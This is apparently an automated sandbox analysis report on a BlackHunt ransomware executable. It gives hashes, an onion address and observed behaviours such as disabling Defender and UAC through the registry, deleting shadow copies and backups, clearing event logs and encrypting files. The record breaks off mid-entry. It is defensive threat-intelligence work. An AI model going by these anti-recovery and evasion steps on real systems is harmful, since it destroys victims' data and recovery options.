Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 22:45
Static task
static1
Behavioral task
behavioral1
Sample
22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe
Resource
win10v2004-20231215-en
General
-
Target
22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe
-
Size
707KB
-
MD5
9726dae4eb0d1106f7a394ab90979409
-
SHA1
40d8f141b0a4b7cc923eda532fea119e4589ff4f
-
SHA256
22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52
-
SHA512
18777369882af4a8446db03d46f66eec83b3d8dcf107618090f7f8c7627a99b01d9d8a60a465d537e2bd4bb45ec23c4a4a7e5c9b13555ad35b3d1b185898819b
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1X8Pvnh:6uaTmkZJ+naie5OTamgEoKxLWGHh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3420 fsutil.exe 1588 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3104 wevtutil.exe 3220 wevtutil.exe 2692 wevtutil.exe 3228 wevtutil.exe 1828 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2468 bcdedit.exe 2212 bcdedit.exe 1212 bcdedit.exe 3612 bcdedit.exe -
Renames multiple (2890) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3416 wbadmin.exe 2812 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3036 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\I: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\O: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\X: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\S: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Q: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\R: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\T: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\V: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\G: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\K: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\L: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\U: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\H: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\J: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\Z: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\M: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\A: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\N: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\P: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened (read-only) \??\B: 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-6 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#BlackHunt_ReadMe.txt 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_zh_4.4.0.v20140623020002.jar 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#BlackHunt_Private.key 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#BlackHunt_ReadMe.hta 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\#BlackHunt_ReadMe.txt 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\7-Zip\Lang\uz-cyrl.txt 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\vintage.png 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#BlackHunt_Private.key 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#BlackHunt_ReadMe.txt 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#BlackHunt_ReadMe.hta 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#BlackHunt_ReadMe.txt 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Oral 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Sofia 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Adak 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kiev 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#BlackHunt_ReadMe.hta 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_view.html 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Puerto_Rico 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#BlackHunt_Private.key 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\#BlackHunt_Private.key 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\VideoLAN\VLC\plugins\demux\#BlackHunt_Private.key 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_ReadMe.txt 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Panama 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pyongyang 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Cocos 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#BlackHunt_ReadMe.txt 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#BlackHunt_ReadMe.hta 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+12 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#BlackHunt_ReadMe.txt 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#BlackHunt_ReadMe.hta 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\#BlackHunt_Private.key 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\7-Zip\#BlackHunt_ReadMe.txt 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_RGB_PAL.wmv 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationRight_ButtonGraphic.png 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\#BlackHunt_ReadMe.txt 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\#BlackHunt_ReadMe.txt 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#BlackHunt_ReadMe.hta 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\#BlackHunt_ReadMe.txt 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\#BlackHunt_ReadMe.hta 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#BlackHunt_ReadMe.txt 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\#BlackHunt_ReadMe.txt 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2012 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1032 vssadmin.exe 2812 vssadmin.exe 1644 vssadmin.exe 1096 vssadmin.exe 4008 vssadmin.exe 3220 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3556 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3196 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1660 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe Token: SeRestorePrivilege 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe Token: SeBackupPrivilege 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe Token: SeTakeOwnershipPrivilege 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe Token: SeAuditPrivilege 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe Token: SeSecurityPrivilege 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe Token: SeIncBasePriorityPrivilege 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe Token: SeBackupPrivilege 4016 vssvc.exe Token: SeRestorePrivilege 4016 vssvc.exe Token: SeAuditPrivilege 4016 vssvc.exe Token: SeBackupPrivilege 1584 wbengine.exe Token: SeRestorePrivilege 1584 wbengine.exe Token: SeSecurityPrivilege 1584 wbengine.exe Token: SeSecurityPrivilege 3104 wevtutil.exe Token: SeBackupPrivilege 3104 wevtutil.exe Token: SeSecurityPrivilege 3220 wevtutil.exe Token: SeBackupPrivilege 3220 wevtutil.exe Token: SeSecurityPrivilege 2692 wevtutil.exe Token: SeBackupPrivilege 2692 wevtutil.exe Token: SeSecurityPrivilege 3228 wevtutil.exe Token: SeBackupPrivilege 3228 wevtutil.exe Token: SeSecurityPrivilege 1828 wevtutil.exe Token: SeBackupPrivilege 1828 wevtutil.exe Token: SeDebugPrivilege 3556 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3000 wrote to memory of 3052 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 29 PID 3000 wrote to memory of 3052 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 29 PID 3000 wrote to memory of 3052 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 29 PID 3000 wrote to memory of 3052 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 29 PID 3000 wrote to memory of 2776 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 31 PID 3000 wrote to memory of 2776 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 31 PID 3000 wrote to memory of 2776 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 31 PID 3000 wrote to memory of 2776 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 31 PID 3000 wrote to memory of 2788 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 32 PID 3000 wrote to memory of 2788 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 32 PID 3000 wrote to memory of 2788 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 32 PID 3000 wrote to memory of 2788 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 32 PID 3000 wrote to memory of 2900 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 34 PID 3000 wrote to memory of 2900 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 34 PID 3000 wrote to memory of 2900 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 34 PID 3000 wrote to memory of 2900 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 34 PID 3000 wrote to memory of 2732 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 36 PID 3000 wrote to memory of 2732 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 36 PID 3000 wrote to memory of 2732 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 36 PID 3000 wrote to memory of 2732 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 36 PID 3000 wrote to memory of 2300 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 38 PID 3000 wrote to memory of 2300 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 38 PID 3000 wrote to memory of 2300 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 38 PID 3000 wrote to memory of 2300 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 38 PID 3000 wrote to memory of 2772 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 40 PID 3000 wrote to memory of 2772 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 40 PID 3000 wrote to memory of 2772 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 40 PID 3000 wrote to memory of 2772 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 40 PID 3000 wrote to memory of 2580 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 42 PID 3000 wrote to memory of 2580 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 42 PID 3000 wrote to memory of 2580 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 42 PID 3000 wrote to memory of 2580 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 42 PID 3000 wrote to memory of 2848 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 44 PID 3000 wrote to memory of 2848 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 44 PID 3000 wrote to memory of 2848 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 44 PID 3000 wrote to memory of 2848 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 44 PID 3000 wrote to memory of 2660 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 46 PID 3000 wrote to memory of 2660 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 46 PID 3000 wrote to memory of 2660 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 46 PID 3000 wrote to memory of 2660 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 46 PID 3000 wrote to memory of 2596 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 48 PID 3000 wrote to memory of 2596 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 48 PID 3000 wrote to memory of 2596 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 48 PID 3000 wrote to memory of 2596 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 48 PID 3000 wrote to memory of 2980 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 50 PID 3000 wrote to memory of 2980 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 50 PID 3000 wrote to memory of 2980 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 50 PID 3000 wrote to memory of 2980 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 50 PID 3000 